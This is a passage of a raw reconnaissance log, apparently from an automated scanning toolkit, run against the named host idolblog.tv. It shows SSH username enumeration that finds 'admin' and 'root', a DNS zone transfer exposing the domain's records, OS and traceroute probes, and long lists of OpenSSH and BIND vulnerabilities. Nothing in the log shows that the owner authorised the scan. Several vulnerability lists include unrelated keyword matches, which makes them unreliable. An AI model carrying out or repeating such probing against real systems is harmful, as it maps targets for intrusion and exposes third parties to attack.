2490| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
2491| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
2492| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
2493| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
2494| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
2495| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
2496| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
2497| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
2498| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
2499| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
2500| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
2501| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
2502| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
2503| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
2504| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
2505| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
2506| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
2507| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
2508| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
2509| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
2510| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
2511| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
2512| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
2513| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
2514| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
2515| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
2516| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
2517| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
2518|
2519| OSVDB - http://www.osvdb.org:
2520| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
2521| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
2522| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
2523| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
2524| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
2525| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
2526| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
2527| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
2528| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
2529| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
2530| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
2531| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
2532| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
2533| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
2534| [56921] OpenSSH Unspecified Remote Compromise
2535| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
2536| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
2537| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
2538| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
2539| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
2540| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
2541| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
2542| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
2543| [43745] OpenSSH X11 Forwarding Local Session Hijacking
2544| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
2545| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
2546| [37315] pam_usb OpenSSH Authentication Unspecified Issue
2547| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
2548| [34601] OPIE w/ OpenSSH Account Enumeration
2549| [34600] OpenSSH S/KEY Authentication Account Enumeration
2550| [32721] OpenSSH Username Password Complexity Account Enumeration
2551| [30232] OpenSSH Privilege Separation Monitor Weakness
2552| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
2553| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
2554| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
2555| [29152] OpenSSH Identical Block Packet DoS
2556| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
2557| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
2558| [22692] OpenSSH scp Command Line Filename Processing Command Injection
2559| [20216] OpenSSH with KerberosV Remote Authentication Bypass
2560| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
2561| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
2562| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
2563| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
2564| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
2565| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
2566| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
2567| [6601] OpenSSH *realloc() Unspecified Memory Errors
2568| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
2569| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
2570| [6072] OpenSSH PAM Conversation Function Stack Modification
2571| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
2572| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
2573| [5408] OpenSSH echo simulation Information Disclosure
2574| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
2575| [4536] OpenSSH Portable AIX linker Privilege Escalation
2576| [3938] OpenSSL and OpenSSH /dev/random Check Failure
2577| [3456] OpenSSH buffer_append_space() Heap Corruption
2578| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
2579| [2140] OpenSSH w/ PAM Username Validity Timing Attack
2580| [2112] OpenSSH Reverse DNS Lookup Bypass
2581| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
2582| [1853] OpenSSH Symbolic Link 'cookies' File Removal
2583| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
2584| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
2585| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
2586| [688] OpenSSH UseLogin Environment Variable Local Command Execution
2587| [642] OpenSSH Multiple Key Type ACL Bypass
2588| [504] OpenSSH SSHv2 Public Key Authentication Bypass
2589| [341] OpenSSH UseLogin Local Privilege Escalation
2590|_
2591Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2592Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
2593No exact OS matches for host (test conditions non-ideal).
2594Network Distance: 10 hops
2595
2596TRACEROUTE (using port 22/tcp)
2597HOP RTT ADDRESS
25981 171.47 ms 10.247.200.1
25992 175.06 ms 213.184.122.97
26003 171.52 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
26014 171.88 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
26025 231.10 ms bzq-219-189-6.cablep.bezeqint.net (62.219.189.6)
26036 227.72 ms bzq-219-189-57.cablep.bezeqint.net (62.219.189.57)
26047 234.71 ms linx-224.retn.net (195.66.224.193)
26058 236.10 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
26069 ...
260710 240.59 ms 89.248.174.131
2608########################################################################################################################################
2609USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2610RHOSTS => idolblog.tv
2611RHOST => idolblog.tv
2612[*] 89.248.174.131:22 - SSH - Using malformed packet technique
2613[*] 89.248.174.131:22 - SSH - Starting scan
2614[+] 89.248.174.131:22 - SSH - User 'admin' found
2615[-] 89.248.174.131:22 - SSH - User 'administrator' not found
2616[-] 89.248.174.131:22 - SSH - User 'anonymous' not found
2617[-] 89.248.174.131:22 - SSH - User 'backup' not found
2618[-] 89.248.174.131:22 - SSH - User 'bee' not found
2619[-] 89.248.174.131:22 - SSH - User 'ftp' not found
2620[-] 89.248.174.131:22 - SSH - User 'guest' not found
2621[-] 89.248.174.131:22 - SSH - User 'GUEST' not found
2622[-] 89.248.174.131:22 - SSH - User 'info' not found
2623[-] 89.248.174.131:22 - SSH - User 'mail' not found
2624[-] 89.248.174.131:22 - SSH - User 'mailadmin' not found
2625[-] 89.248.174.131:22 - SSH - User 'msfadmin' not found
2626[-] 89.248.174.131:22 - SSH - User 'mysql' not found
2627[-] 89.248.174.131:22 - SSH - User 'nobody' not found
2628[-] 89.248.174.131:22 - SSH - User 'oracle' not found
2629[-] 89.248.174.131:22 - SSH - User 'owaspbwa' not found
2630[-] 89.248.174.131:22 - SSH - User 'postfix' not found
2631[-] 89.248.174.131:22 - SSH - User 'postgres' not found
2632[-] 89.248.174.131:22 - SSH - User 'private' not found
2633[-] 89.248.174.131:22 - SSH - User 'proftpd' not found
2634[-] 89.248.174.131:22 - SSH - User 'public' not found
2635[+] 89.248.174.131:22 - SSH - User 'root' found
2636[-] 89.248.174.131:22 - SSH - User 'superadmin' not found
2637[-] 89.248.174.131:22 - SSH - User 'support' not found
2638[-] 89.248.174.131:22 - SSH - User 'sys' not found
2639[-] 89.248.174.131:22 - SSH - User 'system' not found
2640[-] 89.248.174.131:22 - SSH - User 'systemadmin' not found
2641[-] 89.248.174.131:22 - SSH - User 'systemadministrator' not found
2642[-] 89.248.174.131:22 - SSH - User 'test' not found
2643[-] 89.248.174.131:22 - SSH - User 'tomcat' not found
2644[-] 89.248.174.131:22 - SSH - User 'user' not found
2645[-] 89.248.174.131:22 - SSH - User 'webmaster' not found
2646[-] 89.248.174.131:22 - SSH - User 'www-data' not found
2647[-] 89.248.174.131:22 - SSH - User 'Fortimanager_Access' not found
2648[*] Scanned 1 of 1 hosts (100% complete)
2649[*] Auxiliary module execution completed
2650#####################################################################################################################################################
2651Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 03:38 EDT
2652Nmap scan report for idolblog.tv (89.248.174.131)
2653Host is up (0.24s latency).
2654
2655PORT STATE SERVICE VERSION
265653/tcp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
2657|_dns-fuzz: Server didn't response to our probe, can't fuzz
2658| dns-nsec-enum:
2659|_ No NSEC records found
2660| dns-nsec3-enum:
2661|_ DNSSEC NSEC3 not supported
2662| dns-nsid:
2663|_ bind.version: 9.9.4-RedHat-9.9.4-51.el7_4.2
2664| dns-zone-transfer:
2665| idolblog.tv. SOA ns1.ecatel.net. hostmaster.idolblog.tv.
2666| idolblog.tv. MX 10 mail.idolblog.tv.
2667| idolblog.tv. TXT "v=spf1 a mx ip4:89.248.174.131 ~all"
2668| idolblog.tv. A 89.248.174.131
2669| idolblog.tv. NS ns1.ecatel.net.
2670| idolblog.tv. NS ns2.ecatel.net.
2671| ftp.idolblog.tv. A 89.248.174.131
2672| localhost.idolblog.tv. AAAA ::1
2673| localhost.idolblog.tv. A 127.0.0.1
2674| mail.idolblog.tv. A 89.248.174.131
2675| pop.idolblog.tv. A 89.248.174.131
2676| smtp.idolblog.tv. A 89.248.174.131
2677| www.idolblog.tv. A 89.248.174.131
2678|_idolblog.tv. SOA ns1.ecatel.net. hostmaster.idolblog.tv.
2679| vulners:
2680| cpe:/a:isc:bind:9.9.4:
2681| CVE-2015-4620 7.8 https://vulners.com/cve/CVE-2015-4620
2682| CVE-2014-8500 7.8 https://vulners.com/cve/CVE-2014-8500
2683| CVE-2017-3141 7.2 https://vulners.com/cve/CVE-2017-3141
2684| CVE-2015-8461 7.1 https://vulners.com/cve/CVE-2015-8461
2685| CVE-2013-6230 6.8 https://vulners.com/cve/CVE-2013-6230
2686| CVE-2015-1349 5.4 https://vulners.com/cve/CVE-2015-1349
2687| CVE-2018-5740 5.0 https://vulners.com/cve/CVE-2018-5740
2688| CVE-2017-3145 5.0 https://vulners.com/cve/CVE-2017-3145
2689| CVE-2016-9131 5.0 https://vulners.com/cve/CVE-2016-9131
2690| CVE-2016-8864 5.0 https://vulners.com/cve/CVE-2016-8864
2691| CVE-2016-1286 5.0 https://vulners.com/cve/CVE-2016-1286
2692| CVE-2015-8000 5.0 https://vulners.com/cve/CVE-2015-8000
2693| CVE-2017-3143 4.3 https://vulners.com/cve/CVE-2017-3143
2694| CVE-2017-3142 4.3 https://vulners.com/cve/CVE-2017-3142
2695| CVE-2017-3136 4.3 https://vulners.com/cve/CVE-2017-3136
2696| CVE-2016-2775 4.3 https://vulners.com/cve/CVE-2016-2775
2697| CVE-2016-1285 4.3 https://vulners.com/cve/CVE-2016-1285
2698| CVE-2018-5741 4.0 https://vulners.com/cve/CVE-2018-5741
2699| CVE-2016-6170 4.0 https://vulners.com/cve/CVE-2016-6170
2700|_ CVE-2014-0591 2.6 https://vulners.com/cve/CVE-2014-0591
2701| vulscan: VulDB - https://vuldb.com:
2702| [11804] ISC BIND up to 9.9.4 DNS Query bin/named/query.c query_findclosestnsec3() denial of service
2703| [11104] ISC BIND up to 9.9.4 WSAloctl Winsock API Bypass privilege escalation
2704| [9764] ISC BIND up to 9.9.4 RDATA rdata.c denial of service
2705| [119548] ISC BIND 9.9.12/9.10.7/9.11.3/9.12.1-P2 Recursion information disclosure
2706| [95202] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DNSSEC denial of service
2707| [95201] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 DS Record Response denial of service
2708| [95200] ISC BIND up to 9.9.9-P4/9.10.4-P4/9.11.0-P1 ANY Query Response denial of service
2709| [89850] ISC BIND up to 9.9.9-P1/9.10.4-P1/9.11.0b1 Lightweight Resolution named.conf denial of service
2710| [81312] ISC BIND up to 9.9.8-P3/9.10.3-P3 named db.c/resolver.c Signature Record denial of service
2711| [81311] ISC BIND up to 9.9.8-P3/9.10.3-P3 named alist.c/sexpr.c denial of service
2712| [80787] ISC BIND up to 9.9.8-S4 Query rdataset.c denial of service
2713| [79802] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Socket Error resolver.c denial of service
2714| [79801] ISC BIND 9.9.0/9.10.0/9.10.1-P1 Response db.c denial of service
2715| [76834] ISC BIND up to 9.9.7-P1/9.10.2-P2 TKEY Query Packet Crash denial of service
2716| [8108] ISC BIND up to 9.9.3 on Unix/Linux Regular Expression denial of service
2717| [7079] ISC BIND up to 9.9.1 DNS64 IPv6 Transition Mechanism denial of service
2718| [6295] ISC BIND up to 9.9.1-P2 Assertion Error Resource Record Parser RDATA Query denial of service
2719| [5875] ISC BIND 9.9.0/9.9.1 denial of service
2720| [5874] ISC BIND up to 9.9.1-P1 denial of service
2721| [5483] ISC BIND up to 9.9.1 DNS Resource Record information disclosure
2722|
2723| MITRE CVE - https://cve.mitre.org:
2724| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
2725| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
2726| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
2727| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
2728| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
2729| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
2730| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
2731| [CVE-2012-3868] Race condition in the ns_client structure management in ISC BIND 9.9.x before 9.9.1-P2 allows remote attackers to cause a denial of service (memory consumption or process exit) via a large volume of TCP queries.
2732| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
2733| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
2734| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
2735| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
2736|
2737| SecurityFocus - https://www.securityfocus.com/bid/:
2738| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
2739| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
2740| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
2741| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
2742| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
2743| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
2744| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
2745| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
2746| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
2747| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
2748| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
2749| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
2750| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
2751| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
2752| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
2753| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
2754| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
2755| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
2756| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
2757| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
2758| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
2759| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
2760| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
2761| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
2762| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
2763| [100656] Cisco ASR 920 Series Routers CVE-2017-6795 Local Arbitrary File Overwrite Vulnerability
2764| [97450] Cisco ASR 903 and ASR 920 Series CVE-2017-6603 Denial of Service Vulnerability
2765| [93415] Cisco Nexus 9000 Series Switches CVE-2016-1455 Remote Information Disclosure Vulnerability
2766| [82579] Cisco Nexus 9000 Series ACI Mode Switches CVE-2015-6398 Denial of Service Vulnerability
2767| [77686] Cisco Firepower 9000 Series CVE-2015-6380 Unspecified OS Command Injection Vulnerability
2768| [77635] Cisco Firepower 9000 Series CVE-2015-6371 Multiple Arbitrary File Read Vulnerabilities
2769| [77634] Cisco Firepower 9000 Series CVE-2015-6370 Local Command Injection Vulnerability
2770| [77633] Cisco Firepower 9000 Series Switches CVE-2015-6372 HTML Injection Vulnerability
2771| [77631] Cisco Firepower 9000 Series Switches CVE-2015-6374 Clickjacking Vulnerability
2772| [77629] Cisco Firepower 9000 Series CVE-2015-6369 Local Denial of Service Vulnerability
2773| [77628] Cisco Firepower 9000 CVE-2015-6373 Cross Site Request Forgery Vulnerability
2774| [77614] Cisco Firepower 9000 Series Switches CVE-2015-6368 Information Disclosure Vulnerability
2775| [76913] Cisco NX-OS Software for Nexus 9000 Series Switches CVE-2015-6308 Denial of Service Vulnerability
2776| [76791] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-6301 Denial of Service Vulnerability
2777| [76762] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-6295 Denial of Service Vulnerability
2778| [76329] Cisco Nexus 9000 Series Software CVE-2015-4301 Remote Denial of Service Vulnerability
2779| [76057] Cisco Firepower 9000 Series Devices CVE-2015-4287 Information Disclosure Vulnerability
2780| [75471] Cisco Unified IP Phones 9900 Series CVE-2015-4226 Denial of Service Vulnerability
2781| [75378] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-4213 Information Disclosure Vulnerability
2782| [74029] Cisco ASR 9000 Series Routers CVE-2015-0694 Remote Security Bypass Vulnerability
2783| [73895] Cisco NX-OS Software for Nexus 9000 Series CVE-2015-0686 Denial of Service Vulnerability
2784| [73470] Cisco ASR 9000 Series Routers CVE-2015-0685 Denial of Service Vulnerability
2785| [73318] Cisco ASR 9000 Series Aggregation Services Routers CVE-2015-0672 Denial of Service Vulnerability
2786| [72485] Cisco Unified IP Phones 9900 Series CVE-2015-0604 Arbitrary File Upload Vulnerability
2787| [72484] Cisco Unified IP Phones 9900 Series CVE-2015-0603 Local Denial of Service Vulnerability
2788| [72483] Cisco Unified IP Phones 9900 Series CVE-2015-0601 Local Denial of Service Vulnerability
2789| [72482] Cisco Unified IP Phones 9900 Series CVE-2015-0602 Information Disclosure Vulnerability
2790| [72481] Cisco Unified IP Phones 9900 Series CVE-2015-0600 Denial of Service Vulnerability
2791| [71979] Cisco MDS 9000 NX-OS Software CVE-2015-0582 Denial of Service Vulnerability
2792| [70744] Cisco ASR 901 Series Routers CVE-2014-3293 Denial of Service Vulnerability
2793| [70658] ZTE ZXDSL 931VII 'manager_dev_config_t.gch' Information Disclosure Vulnerability
2794| [69057] Cisco Nexus 9000 Series Switches CVE-2014-3330 Access List Security Bypass Vulnerability
2795| [64770] Cisco Unified IP Phones 9900 Series Crafted Header Unregister Denial of Service Vulnerability
2796| [63564] Cisco MDS 9000 NX-OS Software VRRP Frames Denial of Service Vulnerability
2797| [62944] Cisco Unified IP Phones 9900 Series CVE-2013-5532 Buffer Overflow Vulnerability
2798| [62943] Cisco Unified IP Phones 9900 Series CVE-2013-5533 Local Command Injection Vulnerability
2799| [62905] Cisco Unified IP Phones 9900 Series CVE-2013-5526 Denial of Service Vulnerability
2800| [61330] Cisco Unified IP Phones 9900 Series CVE-2013-3426 Arbitrary File Download Vulnerability
2801| [49633] Oracle Application Server 9i 'httpd.conf' Information Disclosure Vulnerability
2802| [48811] Cisco ASR 9000 Series Routers IP Version 4 Denial of Service Vulnerability
2803| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
2804| [15542] NetObjects Fusion 9 Information Disclosure Vulnerability
2805| [6556] Oracle 9i Application Server Sample Scripts Information Disclosure Vulnerability
2806| [6459] Oracle 9i Application Server Java Server Page Source Code Disclosure Vulnerability
2807| [5335] Multiple Lucent Router UDP Port 9 Information Disclosure Vulnerability
2808| [4290] Oracle 9i Default Configuration File Information Disclosure Vulnerability
2809| [4034] Oracle 9IAS OracleJSP Information Disclosure Vulnerability
2810| [3848] Mandrake Bind 9 Package Insecure File Permissions Vulnerability
2811| [2516] Microsoft Plus! 98 Windows ME Password Disclosure Vulnerability
2812|
2813| IBM X-Force - https://exchange.xforce.ibmcloud.com:
2814| [85799] Cisco Unified IP Phones 9900 Series directory traversal
2815| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
2816| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
2817| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
2818| [9250] BIND 9 dns_message_findtype() denial of service
2819| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
2820| [539] Microsoft Windows 95 and Internet Explorer password disclosure
2821| [86004] ISC BIND RDATA denial of service
2822| [84767] ISC BIND denial of service
2823| [83066] ISC BIND denial of service
2824| [81504] ISC BIND AAAA denial of service
2825| [80510] ISC BIND DNS64 denial of service
2826| [79121] ISC BIND queries denial of service
2827| [78479] ISC BIND RDATA denial of service
2828| [77185] ISC BIND TCP queries denial of service
2829| [77184] ISC BIND bad cache denial of service
2830| [76034] ISC BIND rdata denial of service
2831| [73053] ISC BIND cache update policy security bypass
2832| [71332] ISC BIND recursive queries denial of service
2833| [68375] ISC BIND UPDATE denial of service
2834| [68374] ISC BIND Response Policy Zones denial of service
2835| [67665] ISC BIND RRSIG Rrsets denial of service
2836| [67297] ISC BIND RRSIG denial of service
2837| [65554] ISC BIND IXFR transfer denial of service
2838| [63602] ISC BIND allow-query security bypass
2839| [63596] ISC BIND zone data security bypass
2840| [63595] ISC BIND RRSIG denial of service
2841| [62072] ISC BIND DNSSEC query denial of service
2842| [62071] ISC BIND ACL security bypass
2843| [61871] ISC BIND anchors denial of service
2844| [60421] ISC BIND RRSIG denial of service
2845| [56049] ISC BIND out-of-bailiwick weak security
2846| [55937] ISC Bind unspecified cache poisoning
2847| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
2848| [54416] ISC BIND DNSSEC cache poisoning
2849| [52073] ISC BIND dns_db_findrdataset() denial of service
2850| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
2851| [45234] ISC BIND UDP denial of service
2852| [39670] ISC BIND inet_network buffer overflow
2853| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
2854| [37128] RHSA update for ISC BIND RRset denial of service not installed
2855| [37127] RHSA update for ISC BIND named service denial of service not installed
2856| [36275] ISC BIND DNS query spoofing
2857| [35575] ISC BIND query ID cache poisoning
2858| [35571] ISC BIND ACL security bypass
2859| [31838] ISC BIND RRset denial of service
2860| [31799] ISC BIND named service denial of service
2861| [29876] HP Tru64 ypbind core dump information disclosure
2862| [28745] ISC BIND DNSSEC RRset denial of service
2863| [28744] ISC BIND recursive INSIST denial of service
2864| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
2865| [18836] BIND hostname disclosure
2866| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
2867| [10333] ISC BIND SIG null pointer dereference denial of service
2868| [10332] ISC BIND OPT resource record (RR) denial of service
